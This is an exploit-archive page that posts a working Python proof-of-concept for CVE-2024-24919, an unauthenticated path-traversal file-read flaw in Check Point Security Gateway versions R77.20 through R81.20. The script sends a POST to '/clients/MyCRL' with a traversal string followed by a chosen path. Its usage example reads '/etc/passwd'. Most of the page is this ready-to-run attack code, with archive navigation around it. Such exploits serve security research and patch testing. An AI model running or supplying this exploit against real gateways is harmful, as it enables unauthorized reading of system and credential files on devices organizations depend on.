Check Point Security Gateway Information Disclosure

Check Point Security Gateway Information Disclosure: Posted May 31, 2024; Authored by Yesith Alvarez; Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.; tags | exploit, info disclosure; advisories | CVE-2024-24919; SHA-256 | 9a00e15745eee654d5e56bd4984cd3a4bdcf8830f76d50a2c9914ecf0ab23d3f; Download | Favorite | View

Check Point Security Gateway Information Disclosure

# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 
# CVE : CVE-2024-24919

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, |
 | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / / 
  \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/  
                                                                                 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   

def exploit(url, path):
  url = url + '/clients/MyCRL'
  data =   "aCSHELL/../../../../../../../../../../.."+ path
  headers = {        
    'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'
  }
  s = Session()
  req = Request('POST', url, data=data, headers=headers)
  prepped = req.prepare()
  #del prepped.headers['Content-Type']
  resp = s.send(prepped,
      verify=False,
      timeout=15
  )  
  print(prepped.headers)
  print(url)
  print(resp.headers)
  print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 3):
      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))
      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))      
      exit(0)
    else:
      exploit(sys.argv[1],sys.argv[2])

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Check Point Security Gateway Information Disclosure

Check Point Security Gateway Information Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Check Point Security Gateway Information Disclosure

Share This

Check Point Security Gateway Information Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems